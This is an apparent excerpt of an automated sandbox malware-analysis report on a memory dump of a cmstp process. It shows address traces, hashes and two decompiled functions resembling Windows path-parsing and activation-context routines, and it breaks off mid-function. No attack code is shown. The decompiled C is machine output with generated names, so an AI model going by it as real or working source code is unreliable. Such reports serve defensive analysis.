0x051a61e8
0x051a61e8
0x051a61e6
0x051a61ec
0x051a61f3
0x051a6203
0x051a6209
0x051a620a
0x051a6216
0x051a621d
0x051a6227
0x051a6241
0x051a6246
0x051a624c
0x051a6257
0x051a6259
0x051a625c
0x051a625e
0x051a6260
0x051a6260
0x051a6260
0x051a6260
0x051a625e
0x051a6264
0x051a6267
0x051a6269
0x051a6315
0x051a6315
0x051a631b
0x051a631e
0x051a6324
0x051a6327
0x051a632f
0x051a6330
0x051a6333
0x051a633a
0x051a633c
0x051a6335
0x051a6335
0x051a6335
0x051a633f
0x051a6342
0x051a634c
0x051a6352
0x051a6355
0x051a6355
0x051a6359
0x00000000
0x051a626f
0x051a6275
0x051a6275
0x051a6278
0x051a627e
0x051a627e
0x051a6281
0x051a6287
0x051a628d
0x051a6298
0x051a629c
0x051a62a2
0x051a629e
0x051a629e
0x051a629e
0x051a62a7
0x051a62a7
0x051a62aa
0x051a62b0
0x051a62f0
0x051a62f0
0x051a62f2
0x051a62f8
0x051a62fd
0x051a62b2
0x051a62b2
0x051a62b2
0x051a62b5
0x051a62dd
0x051a62e2
0x051a62e5
0x051a62b7
0x051a62b8
0x051a62bb
0x051a62bd
0x051a62c0
0x051a62c4
0x051a62cd
0x051a62cd
0x051a62c0
0x051a62bb
0x051a62b5
0x051a6302
0x051a6303
0x051a6305
0x051a6305
0x051a6305
0x051a630c
0x051a630c
0x00000000
0x051a627e
0x051a6269
0x051a5eac
0x051a5ebb
0x051a5ebe
0x051a5ecb
0x051a5ecb
0x051a5ece
0x051a5ece
0x051a5ed4
0x051a5ed7
0x051a5ed9
0x051a5edb
0x051a5edb
0x051a5ee1
0x051a5ee1
0x051a5ee3
0x051a5f20
0x051a5f20
0x051a5ee5
0x051a5ee5
0x051a5ee5
0x051a5ee8
0x051a5f11
0x051a5f18
0x051a5eea
0x051a5eea
0x051a5eed
0x051a5ef2
0x051a5ef8
0x051a5efb
0x051a5f0a
0x051a5f0a
0x051a5eed
0x051a5ee8
0x051a5f22
0x051a5f28
0x00000000
0x00000000
0x051a5f30
0x051a5f31
0x051a5f37
0x051a5f3a
0x051a5f3d
0x051a5f44
0x00000000
0x00000000
0x00000000
0x051a5f46
0x051a5f48
0x051a5f4d
0x00000000
0x051a5f4d
0x051a5dda
0x051a5ddf
0x00000000
0x051a5ddf
0x051a5dd8
0x051a5da7
0x051a5da9
0x051a5dac
0x051a5dae
0x00000000
0x051a5db4
0x051a5db4
0x00000000
0x051a5db4
0x051a5dae
0x051a5d88
0x051a5d8d
0x051a6363
0x051a6369
0x051a636a
0x051a6370
0x051a6372
0x051a637a
0x051a637b
0x051a637d
0x00000000
0x00000000
0x051a637f
0x051a6385
0x00000000
0x051a6385
0x051a5d38
0x051a5d3b
0x00000000
0x00000000
0x00000000
0x051a5d3b
0x051a5d27
0x051a5d29
0x00000000
0x00000000
0x00000000
0x051a6360
0x00000000
0x051a6360
0x051a5c10
0x051a5c10
0x051a63da
0x051a63e5
0x051a63e5

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2985e942188f48dcc1ca96faa1bc00fee61f99c891c02796fa540b78157153c2
Instruction ID: 64eb398e5ebd29d0af1a45a408c630dcd4430a092738c00394b57e35996f93a1
Opcode Fuzzy Hash: 2985e942188f48dcc1ca96faa1bc00fee61f99c891c02796fa540b78157153c2
Instruction Fuzzy Hash: 09425076E14229CFDB25CF68C880BA9B7B2FF45304F1581AAD84DEB242D7749985CF50

Uniqueness

Uniqueness Score: -1.00%

Function 050F4120 Relevance: .4, Instructions: 444
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E050F4120(signed char __ecx, signed short* __edx, signed short* _a4, signed int _a8, signed short* _a12, signed short* _a16, signed short _a20) {
				signed int _v8;
				void* _v20;
				signed int _v24;
				char _v532;
				char _v540;
				signed short _v544;
				signed int _v548;
				signed short* _v552;
				signed short _v556;
				signed short* _v560;
				signed short* _v564;
				signed short* _v568;
				void* _v570;
				signed short* _v572;
				signed short _v576;
				signed int _v580;
				char _v581;
				void* _v584;
				unsigned int _v588;
				signed short* _v592;
				void* _v597;
				void* _v600;
				void* _v604;
				void* _v609;
				void* _v616;
				void* __ebx;
				void* __edi;
				void* __esi;
				unsigned int _t161;
				signed int _t162;
				unsigned int _t163;
				void* _t169;
				signed short _t173;
				signed short _t177;
				signed short _t181;
				unsigned int _t182;
				signed int _t185;
				signed int _t213;
				signed int _t225;
				short _t233;
				signed char _t234;
				signed int _t242;
				signed int _t243;
				signed int _t244;
				signed int _t245;
				signed int _t250;
				void* _t251;
				signed short* _t254;
				void* _t255;
				signed int _t256;
				void* _t257;
				signed short* _t260;
				signed short _t265;
				signed short* _t269;
				signed short _t271;
				signed short** _t272;
				signed short* _t275;
				signed short _t282;
				signed short _t283;
				signed short _t290;
				signed short _t299;
				signed short _t307;
				signed int _t308;
				signed short _t311;
				signed short* _t315;
				signed short _t316;
				void* _t317;
				void* _t319;
				signed short* _t321;
				void* _t322;
				void* _t323;
				unsigned int _t324;
				signed int _t325;
				void* _t326;
				signed int _t327;
				signed int _t329;

				_t329 = (_t327 & 0xfffffff8) - 0x24c;
				_v8 =  *0x51cd360 ^ _t329;
				_t157 = _a8;
				_t321 = _a4;
				_t315 = __edx;
				_v548 = __ecx;
				_t305 = _a20;
				_v560 = _a12;
				_t260 = _a16;
				_v564 = __edx;
				_v580 = _a8;
				_v572 = _t260;
				_v544 = _a20;
				if( *__edx <= 8) {
					L3:
					if(_t260 != 0) {
						 *_t260 = 0;
					}
					_t254 =  &_v532;
					_v588 = 0x208;
					if((_v548 & 0x00000001) != 0) {
						_v556 =  *_t315;
						_v552 = _t315[2];
						_t161 = E0510F232( &_v556);
						_t316 = _v556;
						_v540 = _t161;
						goto L17;
					} else {
						_t306 = 0x208;
						_t298 = _t315;
						_t316 = E050F6E30(_t315, 0x208, _t254, _t260,  &_v581,  &_v540);
						if(_t316 == 0) {
							L68:
							_t322 = 0xc0000033;
							goto L39;
						} else {
							while(_v581 == 0) {
								_t233 = _v588;
								if(_t316 > _t233) {
									_t234 = _v548;
									if((_t234 & 0x00000004) != 0 || (_t234 & 0x00000008) == 0 &&  *((char*)( *[fs:0x30] + 3)) < 0) {
										_t254 = L050F4620(_t298,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t316);
										if(_t254 == 0) {
											_t169 = 0xc0000017;
										} else {
											_t298 = _v564;
											_v588 = _t316;
											_t306 = _t316;
											_t316 = E050F6E30(_v564, _t316, _t254, _v572,  &_v581,  &_v540);
											if(_t316 != 0) {
												continue;
											} else {
												goto L68;
											}
										}
									} else {
										goto L90;
									}
								} else {
									_v556 = _t316;
									 *((short*)(_t329 + 0x32)) = _t233;
									_v552 = _t254;
									if(_t316 < 2) {
										L11:
										if(_t316 < 4 ||  *_t254 == 0 || _t254[1] != 0x3a) {
											_t161 = 5;
										} else {
											if(_t316 < 6) {
												L87:
												_t161 = 3;
											} else {
												_t242 = _t254[2] & 0x0000ffff;
												if(_t242 != 0x5c) {
													if(_t242 == 0x2f) {
														goto L16;
													} else {
														goto L87;
													}
													goto L101;
												} else {
													L16:
													_t161 = 2;
												}
											}
										}
									} else {
										_t243 =  *_t254 & 0x0000ffff;
										if(_t243 == 0x5c || _t243 == 0x2f) {
											if(_t316 < 4) {
												L81:
												_t161 = 4;
												goto L17;
											} else {
												_t244 = _t254[1] & 0x0000ffff;
												if(_t244 != 0x5c) {
													if(_t244 == 0x2f) {
														goto L60;
													} else {
														goto L81;
													}
												} else {
													L60:
													if(_t316 < 6) {
														L83:
														_t161 = 1;
														goto L17;
													} else {
														_t245 = _t254[2] & 0x0000ffff;
														if(_t245 != 0x2e) {
															if(_t245 == 0x3f) {
																goto L62;
															} else {
																goto L83;
															}
														} else {
															L62:
															if(_t316 < 8) {
																L85:
																_t161 = ((0 | _t316 != 0x00000006) - 0x00000001 & 0x00000006) + 1;
																goto L17;
															} else {
																_t250 = _t254[3] & 0x0000ffff;
																if(_t250 != 0x5c) {
																	if(_t250 == 0x2f) {
																		goto L64;
																	} else {
																		goto L85;
																	}
																} else {
																	L64:
																	_t161 = 6;
																	goto L17;
																}
															}
														}
													}
												}
											}
											goto L101;
										} else {
											goto L11;
										}
									}
									L17:
									if(_t161 != 2) {
										_t162 = _t161 - 1;
										if(_t162 > 5) {
											goto L18;
										} else {
											switch( *((intOrPtr*)(_t162 * 4 +  &M050F45F8))) {
												case 0:
													_v568 = 0x50b1078;
													__eax = 2;
													goto L20;
												case 1:
													goto L18;
												case 2:
													_t163 = 4;
													goto L19;
											}
										}
										goto L41;
									} else {
										L18:
										_t163 = 0;
										L19:
										_v568 = 0x50b11c4;
									}
									L20:
									_v588 = _t163;
									_v564 = _t163 + _t163;
									_t306 =  *_v568 & 0x0000ffff;
									_t265 = _t306 - _v564 + 2 + (_t316 & 0x0000ffff);
									_v576 = _t265;
									if(_t265 > 0xfffe) {
										L90:
										_t322 = 0xc0000106;
									} else {
										if(_t321 != 0) {
											if(_t265 > (_t321[1] & 0x0000ffff)) {
												if(_v580 != 0) {
													goto L23;
												} else {
													_t322 = 0xc0000106;
													goto L39;
												}
											} else {
												_t177 = _t306;
												goto L25;
											}
											goto L101;
										} else {
											if(_v580 == _t321) {
												_t322 = 0xc000000d;
											} else {
												L23:
												_t173 = L050F4620(_t265,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t265);
												_t269 = _v592;
												_t269[2] = _t173;
												if(_t173 == 0) {
													_t322 = 0xc0000017;
												} else {
													_t316 = _v556;
													 *_t269 = 0;
													_t321 = _t269;
													_t269[1] = _v576;
													_t177 =  *_v568 & 0x0000ffff;
													L25:
													_v580 = _t177;
													if(_t177 == 0) {
														L29:
														_t307 =  *_t321 & 0x0000ffff;
													} else {
														_t290 =  *_t321 & 0x0000ffff;
														_v576 = _t290;
														_t310 = _t177 & 0x0000ffff;
														if((_t290 & 0x0000ffff) + (_t177 & 0x0000ffff) > (_t321[1] & 0x0000ffff)) {
															_t307 =  *_t321 & 0xffff;
														} else {
															_v576 = _t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2;
															E0511F720(_t321[2] + ((_v576 & 0x0000ffff) >> 1) * 2, _v568[2], _t310);
															_t329 = _t329 + 0xc;
															_t311 = _v580;
															_t225 =  *_t321 + _t311 & 0x0000ffff;
															 *_t321 = _t225;
															if(_t225 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v576 + ((_t311 & 0x0000ffff) >> 1) * 2)) = 0;
															}
															goto L29;
														}
													}
													_t271 = _v556 - _v588 + _v588;
													_v580 = _t307;
													_v576 = _t271;
													if(_t271 != 0) {
														_t308 = _t271 & 0x0000ffff;
														_v588 = _t308;
														if(_t308 + (_t307 & 0x0000ffff) <= (_t321[1] & 0x0000ffff)) {
															_v580 = _t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2;
															E0511F720(_t321[2] + ((_v580 & 0x0000ffff) >> 1) * 2, _v552 + _v564, _t308);
															_t329 = _t329 + 0xc;
															_t213 =  *_t321 + _v576 & 0x0000ffff;
															 *_t321 = _t213;
															if(_t213 + 1 < (_t321[1] & 0x0000ffff)) {
																 *((short*)(_v580 + (_v588 >> 1) * 2)) = 0;
															}
														}
													}
													_t272 = _v560;
													if(_t272 != 0) {
														 *_t272 = _t321;
													}
													_t306 = 0;
													 *((short*)(_t321[2] + (( *_t321 & 0x0000ffff) >> 1) * 2)) = 0;
													_t275 = _v572;
													if(_t275 != 0) {
														_t306 =  *_t275;
														if(_t306 != 0) {
															 *_t275 = ( *_v568 & 0x0000ffff) - _v564 - _t254 + _t306 + _t321[2];
														}
													}
													_t181 = _v544;
													if(_t181 != 0) {
														 *_t181 = 0;
														 *((intOrPtr*)(_t181 + 4)) = 0;
														 *((intOrPtr*)(_t181 + 8)) = 0;
														 *((intOrPtr*)(_t181 + 0xc)) = 0;
														if(_v540 == 5) {
															_t182 = E050D52A5(1);
															_v588 = _t182;
															if(_t182 == 0) {
																E050EEB70(1, 0x51c79a0);
																goto L38;
															} else {
																_v560 = _t182 + 0xc;
																_t185 = E050EAA20( &_v556, _t182 + 0xc,  &_v556, 1);
																if(_t185 == 0) {
																	_t324 = _v588;
																	goto L97;
																} else {
																	_t306 = _v544;
																	_t282 = ( *_v560 & 0x0000ffff) - _v564 + ( *_v568 & 0x0000ffff) + _t321[2];
																	 *(_t306 + 4) = _t282;
																	_v576 = _t282;
																	_t325 = _t316 -  *_v560 & 0x0000ffff;
																	 *_t306 = _t325;
																	if( *_t282 == 0x5c) {
																		_t149 = _t325 - 2; // -2
																		_t283 = _t149;
																		 *_t306 = _t283;
																		 *(_t306 + 4) = _v576 + 2;
																		_t185 = _t283 & 0x0000ffff;
																	}
																	_t324 = _v588;
																	 *(_t306 + 2) = _t185;
																	if((_v548 & 0x00000002) == 0) {
																		L97:
																		asm("lock xadd [esi], eax");
																		if((_t185 | 0xffffffff) == 0) {
																			_push( *((intOrPtr*)(_t324 + 4)));
																			E051195D0();
																			L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t324);
																		}
																	} else {
																		 *(_t306 + 0xc) = _t324;
																		 *((intOrPtr*)(_t306 + 8)) =  *((intOrPtr*)(_t324 + 4));
																	}
																	goto L38;
																}
															}
															goto L41;
														}
													}
													L38:
													_t322 = 0;
												}
											}
										}
									}
									L39:
									if(_t254 !=  &_v532) {
										L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t254);
									}
									_t169 = _t322;
								}
								goto L41;
							}
							goto L68;
						}
					}
					L41:
					_pop(_t317);
					_pop(_t323);
					_pop(_t255);
					return E0511B640(_t169, _t255, _v8 ^ _t329, _t306, _t317, _t323);
				} else {
					_t299 = __edx[2];
					if( *_t299 == 0x5c) {
						_t256 =  *(_t299 + 2) & 0x0000ffff;
						if(_t256 != 0x5c) {
							if(_t256 != 0x3f) {
								goto L2;
							} else {
								goto L50;
							}
						} else {
							L50:
							if( *((short*)(_t299 + 4)) != 0x3f ||  *((short*)(_t299 + 6)) != 0x5c) {
								goto L2;
							} else {
								_t251 = E05113D43(_t315, _t321, _t157, _v560, _v572, _t305);
								_pop(_t319);
								_pop(_t326);
								_pop(_t257);
								return E0511B640(_t251, _t257, _v24 ^ _t329, _t321, _t319, _t326);
							}
						}
					} else {
						L2:
						_t260 = _v572;
						goto L3;
					}
				}
				L101:
			}

0x050f4128
0x050f4135
0x050f413c
0x050f4141
0x050f4145
0x050f4147
0x050f414e
0x050f4151
0x050f4159
0x050f415c
0x050f4160
0x050f4164
0x050f4168
0x050f416c
0x050f417f
0x050f4181
0x050f446a
0x050f446a
0x050f418c
0x050f4195
0x050f4199
0x050f4432
0x050f4439
0x050f443d
0x050f4442
0x050f4447
0x00000000
0x050f419f
0x050f41a3
0x050f41b1
0x050f41b9
0x050f41bd
0x050f45db
0x050f45db
0x00000000
0x050f41c3
0x050f41c3
0x050f41ce
0x050f41d4
0x0513e138
0x0513e13e
0x0513e169
0x0513e16d
0x0513e19e
0x0513e16f
0x0513e16f
0x0513e175
0x0513e179
0x0513e18f
0x0513e193
0x00000000
0x0513e199
0x00000000
0x0513e199
0x0513e193
0x00000000
0x00000000
0x00000000
0x050f41da
0x050f41da
0x050f41df
0x050f41e4
0x050f41ec
0x050f4203
0x050f4207
0x0513e1fd
0x050f4222
0x050f4226
0x0513e1f3
0x0513e1f3
0x050f422c
0x050f422c
0x050f4233
0x0513e1ed
0x00000000
0x00000000
0x00000000
0x00000000
0x00000000
0x050f4239
0x050f4239
0x050f4239
0x050f4239
0x050f4233
0x050f4226
0x050f41ee
0x050f41ee
0x050f41f4
0x050f4575
0x0513e1b1
0x0513e1b1
0x00000000
0x050f457b
0x050f457b
0x050f4582
0x0513e1ab
0x00000000
0x00000000
0x00000000
0x00000000
0x050f4588
0x050f4588
0x050f458c
0x0513e1c4
0x0513e1c4
0x00000000
0x050f4592
0x050f4592
0x050f4599
0x0513e1be
0x00000000
0x00000000
0x00000000
0x00000000
0x050f459f
0x050f459f
0x050f45a3
0x0513e1d7
0x0513e1e4
0x00000000
0x050f45a9
0x050f45a9
0x050f45b0
0x0513e1d1
0x00000000
0x00000000
0x00000000
0x00000000
0x050f45b6
0x050f45b6
0x050f45b6
0x00000000
0x050f45b6
0x050f45b0
0x050f45a3
0x050f4599
0x050f458c
0x050f4582
0x00000000
0x00000000
0x00000000
0x00000000
0x050f41f4
0x050f423e
0x050f4241
0x050f45c0
0x050f45c4
0x00000000
0x050f45ca
0x050f45ca
0x00000000
0x0513e207
0x0513e20f
0x00000000
0x00000000
0x00000000
0x00000000
0x050f45d1
0x00000000
0x00000000
0x050f45ca
0x00000000
0x050f4247
0x050f4247
0x050f4247
0x050f4249
0x050f4249
0x050f4249
0x050f4251
0x050f4251
0x050f4257
0x050f425f
0x050f426e
0x050f4270
0x050f427a
0x0513e219
0x0513e219
0x050f4280
0x050f4282
0x050f4456
0x050f45ea
0x00000000
0x050f45f0
0x0513e223
0x00000000
0x0513e223
0x050f445c
0x050f445c
0x00000000
0x050f445c
0x00000000
0x050f4288
0x050f428c
0x0513e298
0x050f4292
0x050f4292
0x050f429e
0x050f42a3
0x050f42a7
0x050f42ac
0x0513e22d
0x050f42b2
0x050f42b2
0x050f42b9
0x050f42bc
0x050f42c2
0x050f42ca
0x050f42cd
0x050f42cd
0x050f42d4
0x050f433f
0x050f433f
0x050f42d6
0x050f42d6
0x050f42d9
0x050f42dd
0x050f42eb
0x0513e23a
0x050f42f1
0x050f4305
0x050f430d
0x050f4315
0x050f4318
0x050f431f
0x050f4322
0x050f432e
0x050f433b
0x050f433b
0x00000000
0x050f432e
0x050f42eb
0x050f434c
0x050f434e
0x050f4352
0x050f4359
0x050f435e
0x050f4361
0x050f436e
0x050f438a
0x050f438e
0x050f4396
0x050f439e
0x050f43a1
0x050f43ad
0x050f43bb
0x050f43bb
0x050f43ad
0x050f436e
0x050f43bf
0x050f43c5
0x050f4463
0x050f4463
0x050f43ce
0x050f43d5
0x050f43d9
0x050f43df
0x050f4475
0x050f4479
0x050f4491
0x050f4491
0x050f4479
0x050f43e5
0x050f43eb
0x050f43f4
0x050f43f6
0x050f43f9
0x050f43fc
0x050f43ff
0x050f44e8
0x050f44ed
0x050f44f3
0x0513e247
0x00000000
0x050f44f9
0x050f4504
0x050f4508
0x050f450f
0x0513e269
0x00000000
0x050f4515
0x050f4519
0x050f4531
0x050f4534
0x050f4537
0x050f453e
0x050f4541
0x050f454a
0x0513e255
0x0513e255
0x0513e25b
0x0513e25e
0x0513e261
0x0513e261
0x050f4555
0x050f4559
0x050f455d
0x0513e26d
0x0513e270
0x0513e274
0x0513e27a
0x0513e27d
0x0513e28e
0x0513e28e
0x050f4563
0x050f4563
0x050f4569
0x050f4569
0x00000000
0x050f455d
0x050f450f
0x00000000
0x050f44f3
0x050f43ff
0x050f4405
0x050f4405
0x050f4405
0x050f42ac
0x050f428c
0x050f4282
0x050f4407
0x050f440d
0x0513e2af
0x0513e2af
0x050f4413
0x050f4413
0x00000000
0x050f41d4
0x00000000
0x050f41c3
0x050f41bd
0x050f4415
0x050f4415
0x050f4416
0x050f4417
0x050f4429
0x050f416e
0x050f416e
0x050f4175
0x050f4498
0x050f449f
0x0513e12d
0x00000000
0x0513e133
0x00000000
0x0513e133
0x050f44a5
0x050f44a5
0x050f44aa
0x00000000
0x050f44bb
0x050f44ca
0x050f44d6
0x050f44d7
0x050f44d8
0x050f44e3
0x050f44e3
0x050f44aa
0x050f417b
0x050f417b
0x050f417b
0x00000000
0x050f417b
0x050f4175
0x00000000

Memory Dump Source

Source File: 00000010.00000002.516081168.00000000050B0000.00000040.00000800.00020000.00000000.sdmp, Offset: 050B0000, based on PE: true

Associated: 00000010.00000002.516489790.00000000051CB000.00000040.00000800.00020000.00000000.sdmpDownload File
Associated: 00000010.00000002.516510294.00000000051CF000.00000040.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_16_2_50b0000_cmstp.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ca809201dcd730998ea6690177ca9ba5bb75baf6df3e449e9afe61d10c7640f8
Instruction ID: 0d1be66f9295ea3b253483b8c4b10c3ad2297a4e70c5dada2589eaee90043596
Opcode Fuzzy Hash: ca809201dcd730998ea6690177ca9ba5bb75baf6df3e449e9afe61d10c7640f8
Instruction Fuzzy Hash: 6FF179706083118BCB64CF19D495A7FB7E2FF88714F444A2EFA868B690E774D885CB52

Uniqueness

Uniqueness Score: -1.00%

Function 051020A0 Relevance: .4, Instructions: 420
COMMONCrypto

Download Yara Rule

C-Code - Quality: 92%

			E051020A0(void* __ebx, unsigned int __ecx, signed int __edx, void* __eflags, intOrPtr* _a4, signed int _a8, intOrPtr* _a12, void* _a16, intOrPtr* _a20) {
				signed int _v16;
				signed int _v20;
				signed char _v24;
				intOrPtr _v28;
				signed int _v32;
				void* _v36;
				char _v48;
				signed int _v52;
				signed int _v56;
				unsigned int _v60;
				char _v64;
				unsigned int _v68;
				signed int _v72;
				char _v73;
				signed int _v74;
				char _v75;
				signed int _v76;
				void* _v81;
				void* _v82;
				void* _v89;
				void* _v92;
				void* _v97;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t128;
				void* _t129;
				signed int _t130;
				void* _t132;
				signed char _t133;
				intOrPtr _t135;
				signed int _t137;
				signed int _t140;
				signed int* _t144;
				signed int* _t145;
				intOrPtr _t146;
				signed int _t147;
				signed char* _t148;
				signed int _t149;
				signed int _t153;
				signed int _t169;
				signed int _t174;
				signed int _t180;
				void* _t197;
				void* _t198;
				signed int _t201;
				intOrPtr* _t202;
				intOrPtr* _t205;
				signed int _t210;
				signed int _t215;
				signed int _t218;
				signed char _t221;
				signed int _t226;
				char _t227;
				signed int _t228;
				void* _t229;
				unsigned int _t231;
				void* _t235;
				signed int _t240;
				signed int _t241;
				void* _t242;
				signed int _t246;
				signed int _t248;
				signed int _t252;
				signed int _t253;
				void* _t254;
				intOrPtr* _t256;
				intOrPtr _t257;
				unsigned int _t262;
				signed int _t265;
				void* _t267;
				signed int _t275;

				_t198 = __ebx;
				_t267 = (_t265 & 0xfffffff0) - 0x48;
				_v68 = __ecx;
				_v73 = 0;
				_t201 = __edx & 0x00002000;
				_t128 = __edx & 0xffffdfff;
				_v74 = __edx & 0xffffff00 | __eflags != 0x00000000;
				_v72 = _t128;
				if((_t128 & 0x00000008) != 0) {
					__eflags = _t128 - 8;
					if(_t128 != 8) {
						L69:
						_t129 = 0xc000000d;
						goto L23;
					} else {
						_t130 = 0;
						_v72 = 0;
						_v75 = 1;
						L2:
						_v74 = 1;
						_t226 =  *0x51c8714; // 0x0
						if(_t226 != 0) {
							__eflags = _t201;
							if(_t201 != 0) {
								L62:
								_v74 = 1;
								L63:
								_t130 = _t226 & 0xffffdfff;
								_v72 = _t130;
								goto L3;
							}
							_v74 = _t201;
							__eflags = _t226 & 0x00002000;
							if((_t226 & 0x00002000) == 0) {
								goto L63;
							}
							goto L62;
						}
						L3:
						_t227 = _v75;
						L4:
						_t240 = 0;
						_v56 = 0;
						_t252 = _t130 & 0x00000100;
						if(_t252 != 0 || _t227 != 0) {
							_t240 = _v68;
							_t132 = E05102EB0(_t240);
							__eflags = _t132 - 2;
							if(_t132 != 2) {
								__eflags = _t132 - 1;
								if(_t132 == 1) {
									goto L25;
								}
								__eflags = _t132 - 6;
								if(_t132 == 6) {
									__eflags =  *((short*)(_t240 + 4)) - 0x3f;
									if( *((short*)(_t240 + 4)) != 0x3f) {
										goto L40;
									}
									_t197 = E05102EB0(_t240 + 8);
									__eflags = _t197 - 2;
									if(_t197 == 2) {
										goto L25;
									}
								}
								L40:
								_t133 = 1;
								L26:
								_t228 = _v75;
								_v56 = _t240;
								__eflags = _t133;
								if(_t133 != 0) {
									__eflags = _t228;
									if(_t228 == 0) {
										L43:
										__eflags = _v72;
										if(_v72 == 0) {
											goto L8;
										}
										goto L69;
									}
									_t133 = E050D58EC(_t240);
									_t221 =  *0x51c5cac; // 0x16
									__eflags = _t221 & 0x00000040;
									if((_t221 & 0x00000040) != 0) {
										_t228 = 0;
										__eflags = _t252;
										if(_t252 != 0) {
											goto L43;
										}
										_t133 = _v72;
										goto L7;
									}
									goto L43;
								} else {
									_t133 = _v72;
									goto L6;
								}
							}
							L25:
							_t133 = _v73;
							goto L26;
						} else {
							L6:
							_t221 =  *0x51c5cac; // 0x16
							L7:
							if(_t133 != 0) {
								__eflags = _t133 & 0x00001000;
								if((_t133 & 0x00001000) != 0) {
									_t133 = _t133 | 0x00000a00;
									__eflags = _t221 & 0x00000004;
									if((_t221 & 0x00000004) != 0) {
										_t133 = _t133 | 0x00000400;
									}
								}
								__eflags = _t228;
								if(_t228 != 0) {
									_t133 = _t133 | 0x00000100;
								}
								_t229 = E05114A2C(0x51c6e40, 0x5114b30, _t133, _t240);
								__eflags = _t229;
								if(_t229 == 0) {
									_t202 = _a20;
									goto L100;
								} else {
									_t135 =  *((intOrPtr*)(_t229 + 0x38));
									L15:
									_t202 = _a20;
									 *_t202 = _t135;
									if(_t229 == 0) {
										L100:
										 *_a4 = 0;
										_t137 = _a8;
										__eflags = _t137;
										if(_t137 != 0) {
											 *_t137 = 0;
										}
										 *_t202 = 0;
										_t129 = 0xc0000017;
										goto L23;
									} else {
										_t242 = _a16;
										if(_t242 != 0) {
											_t254 = _t229;
											memcpy(_t242, _t254, 0xd << 2);
											_t267 = _t267 + 0xc;
											_t242 = _t254 + 0x1a;
										}
										_t205 = _a4;
										_t25 = _t229 + 0x48; // 0x48
										 *_t205 = _t25;
										_t140 = _a8;
										if(_t140 != 0) {
											__eflags =  *((char*)(_t267 + 0xa));
											if( *((char*)(_t267 + 0xa)) != 0) {
												 *_t140 =  *((intOrPtr*)(_t229 + 0x44));
											} else {
												 *_t140 = 0;
											}
										}
										_t256 = _a12;
										if(_t256 != 0) {
											 *_t256 =  *((intOrPtr*)(_t229 + 0x3c));
										}
										_t257 =  *_t205;
										_v48 = 0;
										 *((intOrPtr*)(_t267 + 0x2c)) = 0;
										_v56 = 0;
										_v52 = 0;
										_t144 =  *( *[fs:0x30] + 0x50);
										if(_t144 != 0) {
											__eflags =  *_t144;
											if( *_t144 == 0) {
												goto L20;
											}
											_t145 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
											goto L21;
										} else {
											L20:
											_t145 = 0x7ffe0384;
											L21:
											if( *_t145 != 0) {
												_t146 =  *[fs:0x30];
												__eflags =  *(_t146 + 0x240) & 0x00000004;
												if(( *(_t146 + 0x240) & 0x00000004) != 0) {
													_t147 = E050F7D50();
													__eflags = _t147;
													if(_t147 == 0) {
														_t148 = 0x7ffe0385;
													} else {
														_t148 =  &(( *( *[fs:0x30] + 0x50))[0x8a]);
													}
													__eflags =  *_t148 & 0x00000020;
													if(( *_t148 & 0x00000020) != 0) {
														_t149 = _v72;
														__eflags = _t149;
														if(__eflags == 0) {
															_t149 = 0x50b5c80;
														}
														_push(_t149);
														_push( &_v48);
														 *((char*)(_t267 + 0xb)) = E0510F6E0(_t198, _t242, _t257, __eflags);
														_push(_t257);
														_push( &_v64);
														_t153 = E0510F6E0(_t198, _t242, _t257, __eflags);
														__eflags =  *((char*)(_t267 + 0xb));
														if( *((char*)(_t267 + 0xb)) != 0) {
															__eflags = _t153;
															if(_t153 != 0) {
																__eflags = 0;
																E05157016(0x14c1, 0, 0, 0,  &_v72,  &_v64);
																L050F2400(_t267 + 0x20);
															}
															L050F2400( &_v64);
														}
													}
												}
											}
											_t129 = 0;
											L23:
											return _t129;
										}
									}
								}
							}
							L8:
							_t275 = _t240;
							if(_t275 != 0) {
								_v73 = 0;
								_t253 = 0;
								__eflags = 0;
								L29:
								_push(0);
								_t241 = E05102397(_t240);
								__eflags = _t241;
								if(_t241 == 0) {
									_t229 = 0;
									L14:
									_t135 = 0;
									goto L15;
								}
								__eflags =  *((char*)(_t267 + 0xb));
								 *(_t241 + 0x34) = 1;
								if( *((char*)(_t267 + 0xb)) != 0) {
									E050F2280(_t134, 0x51c8608);
									__eflags =  *0x51c6e48 - _t253; // 0x33ab548
									if(__eflags != 0) {
										L48:
										_t253 = 0;
										__eflags = 0;
										L49:
										E050EFFB0(_t198, _t241, 0x51c8608);
										__eflags = _t253;
										if(_t253 != 0) {
											L050F77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t253);
										}
										goto L31;
									}
									 *0x51c6e48 = _t241;
									 *(_t241 + 0x34) =  *(_t241 + 0x34) + 1;
									__eflags = _t253;
									if(_t253 != 0) {
										_t57 = _t253 + 0x34;
										 *_t57 =  *(_t253 + 0x34) + 0xffffffff;
										__eflags =  *_t57;
										if( *_t57 == 0) {
											goto L49;
										}
									}
									goto L48;
								}
								L31:
								_t229 = _t241;
								goto L14;
							}
							_v73 = 1;
							_v64 = _t240;
							asm("lock bts dword [esi], 0x0");
							if(_t275 < 0) {
								_t231 =  *0x51c8608; // 0x0
								while(1) {
									_v60 = _t231;
									__eflags = _t231 & 0x00000001;
									if((_t231 & 0x00000001) != 0) {
										goto L76;
									}
									_t73 = _t231 + 1; // 0x1
									_t210 = _t73;
									asm("lock cmpxchg [edi], ecx");
									__eflags = _t231 - _t231;
									if(_t231 != _t231) {
